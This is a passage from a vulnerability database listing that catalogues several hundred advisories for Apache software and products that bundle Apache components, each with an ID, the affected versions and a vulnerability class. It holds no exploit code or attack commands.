2364| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
2365| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
2366| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
2367| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
2368| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
2369| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
2370| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
2371| [90263] Apache Archiva Header denial of service
2372| [90262] Apache Archiva Deserialize privilege escalation
2373| [90261] Apache Archiva XML DTD Connection privilege escalation
2374| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
2375| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
2376| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
2377| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
2378| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
2379| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
2380| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
2381| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
2382| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
2383| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
2384| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
2385| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
2386| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
2387| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
2388| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
2389| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
2390| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
2391| [87765] Apache James Server 2.3.2 Command privilege escalation
2392| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
2393| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
2394| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
2395| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
2396| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
2397| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
2398| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
2399| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
2400| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
2401| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
2402| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
2403| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
2404| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
2405| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
2406| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
2407| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
2408| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
2409| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
2410| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
2411| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
2412| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
2413| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
2414| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
2415| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
2416| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
2417| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
2418| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
2419| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
2420| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
2421| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
2422| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
2423| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
2424| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
2425| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
2426| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
2427| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
2428| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
2429| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
2430| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
2431| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
2432| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
2433| [82076] Apache Ranger up to 0.5.1 privilege escalation
2434| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
2435| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
2436| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
2437| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
2438| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
2439| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
2440| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
2441| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
2442| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
2443| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
2444| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
2445| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
2446| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
2447| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
2448| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
2449| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
2450| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
2451| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
2452| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
2453| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
2454| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
2455| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
2456| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
2457| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
2458| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
2459| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
2460| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
2461| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
2462| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
2463| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
2464| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
2465| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
2466| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
2467| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
2468| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
2469| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
2470| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
2471| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
2472| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
2473| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
2474| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
2475| [79791] Cisco Products Apache Commons Collections Library privilege escalation
2476| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
2477| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
2478| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
2479| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
2480| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
2481| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
2482| [78989] Apache Ambari up to 2.1.1 Open Redirect
2483| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
2484| [78987] Apache Ambari up to 2.0.x cross site scripting
2485| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
2486| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
2487| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
2488| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
2489| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
2490| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
2491| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
2492| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
2493| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
2494| [77406] Apache Flex BlazeDS AMF Message XML External Entity
2495| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
2496| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
2497| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
2498| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
2499| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
2500| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
2501| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
2502| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
2503| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
2504| [76567] Apache Struts 2.3.20 unknown vulnerability
2505| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
2506| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
2507| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
2508| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
2509| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
2510| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
2511| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
2512| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
2513| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
2514| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
2515| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
2516| [74793] Apache Tomcat File Upload denial of service
2517| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
2518| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
2519| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
2520| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
2521| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
2522| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
2523| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
2524| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
2525| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
2526| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
2527| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
2528| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
2529| [74468] Apache Batik up to 1.6 denial of service
2530| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
2531| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
2532| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
2533| [74174] Apache WSS4J up to 2.0.0 privilege escalation
2534| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
2535| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
2536| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
2537| [73731] Apache XML Security unknown vulnerability
2538| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
2539| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
2540| [73593] Apache Traffic Server up to 5.1.0 denial of service
2541| [73511] Apache POI up to 3.10 Deadlock denial of service
2542| [73510] Apache Solr up to 4.3.0 cross site scripting
2543| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
2544| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
2545| [73173] Apache CloudStack Stack-Based unknown vulnerability
2546| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
2547| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
2548| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
2549| [72890] Apache Qpid 0.30 unknown vulnerability
2550| [72887] Apache Hive 0.13.0 File Permission privilege escalation
2551| [72878] Apache Cordova 3.5.0 cross site request forgery
2552| [72877] Apache Cordova 3.5.0 cross site request forgery
2553| [72876] Apache Cordova 3.5.0 cross site request forgery
2554| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
2555| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
2556| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
2557| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
2558| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
2559| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
2560| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
2561| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
2562| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
2563| [71629] Apache Axis2/C spoofing
2564| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
2565| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
2566| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
2567| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
2568| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
2569| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
2570| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
2571| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
2572| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
2573| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
2574| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
2575| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
2576| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
2577| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
2578| [70809] Apache POI up to 3.11 Crash denial of service
2579| [70808] Apache POI up to 3.10 unknown vulnerability
2580| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
2581| [70749] Apache Axis up to 1.4 getCN spoofing
2582| [70701] Apache Traffic Server up to 3.3.5 denial of service
2583| [70700] Apache OFBiz up to 12.04.03 cross site scripting
2584| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
2585| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
2586| [70661] Apache Subversion up to 1.6.17 denial of service
2587| [70660] Apache Subversion up to 1.6.17 spoofing
2588| [70659] Apache Subversion up to 1.6.17 spoofing
2589| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
2590| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
2591| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
2592| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
2593| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
2594| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
2595| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
2596| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
2597| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
2598| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
2599| [69846] Apache HBase up to 0.94.8 information disclosure
2600| [69783] Apache CouchDB up to 1.2.0 memory corruption
2601| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
2602| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
2603| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
2604| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
2605| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
2606| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
2607| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
2608| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
2609| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
2610| [69431] Apache Archiva up to 1.3.6 cross site scripting
2611| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
2612| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
2613| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
2614| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
2615| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
2616| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
2617| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
2618| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
2619| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
2620| [66739] Apache Camel up to 2.12.2 unknown vulnerability
2621| [66738] Apache Camel up to 2.12.2 unknown vulnerability
2622| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
2623| [66695] Apache CouchDB up to 1.2.0 cross site scripting
2624| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
2625| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
2626| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
2627| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
2628| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
2629| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
2630| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
2631| [66356] Apache Wicket up to 6.8.0 information disclosure
2632| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
2633| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
2634| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
2635| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
2636| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
2637| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
2638| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
2639| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
2640| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
2641| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
2642| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
2643| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
2644| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
2645| [65668] Apache Solr 4.0.0 Updater denial of service
2646| [65665] Apache Solr up to 4.3.0 denial of service
2647| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
2648| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
2649| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
2650| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
2651| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
2652| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
2653| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
2654| [65410] Apache Struts 2.3.15.3 cross site scripting
2655| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
2656| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
2657| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
2658| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
2659| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
2660| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
2661| [65340] Apache Shindig 2.5.0 information disclosure
2662| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
2663| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
2664| [10826] Apache Struts 2 File privilege escalation
2665| [65204] Apache Camel up to 2.10.1 unknown vulnerability
2666| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
2667| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
2668| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
2669| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
2670| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
2671| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
2672| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
2673| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
2674| [64722] Apache XML Security for C++ Heap-based memory corruption
2675| [64719] Apache XML Security for C++ Heap-based memory corruption
2676| [64718] Apache XML Security for C++ verify denial of service
2677| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
2678| [64716] Apache XML Security for C++ spoofing
2679| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
2680| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
2681| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
2682| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
2683| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
2684| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
2685| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
2686| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
2687| [64485] Apache Struts up to 2.2.3.0 privilege escalation
2688| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
2689| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
2690| [64467] Apache Geronimo 3.0 memory corruption
2691| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
2692| [64457] Apache Struts up to 2.2.3.0 cross site scripting
2693| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
2694| [9184] Apache Qpid up to 0.20 SSL misconfiguration
2695| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
2696| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
2697| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
2698| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
2699| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
2700| [8873] Apache Struts 2.3.14 privilege escalation
2701| [8872] Apache Struts 2.3.14 privilege escalation
2702| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
2703| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
2704| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
2705| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
2706| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
2707| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
2708| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
2709| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
2710| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
2711| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
2712| [64006] Apache ActiveMQ up to 5.7.0 denial of service
2713| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
2714| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
2715| [8427] Apache Tomcat Session Transaction weak authentication
2716| [63960] Apache Maven 3.0.4 Default Configuration spoofing
2717| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
2718| [63750] Apache qpid up to 0.20 checkAvailable denial of service
2719| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
2720| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
2721| [63747] Apache Rave up to 0.20 User Account information disclosure
2722| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
2723| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
2724| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
2725| [7687] Apache CXF up to 2.7.2 Token weak authentication
2726| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
2727| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
2728| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
2729| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
2730| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
2731| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
2732| [63090] Apache Tomcat up to 4.1.24 denial of service
2733| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
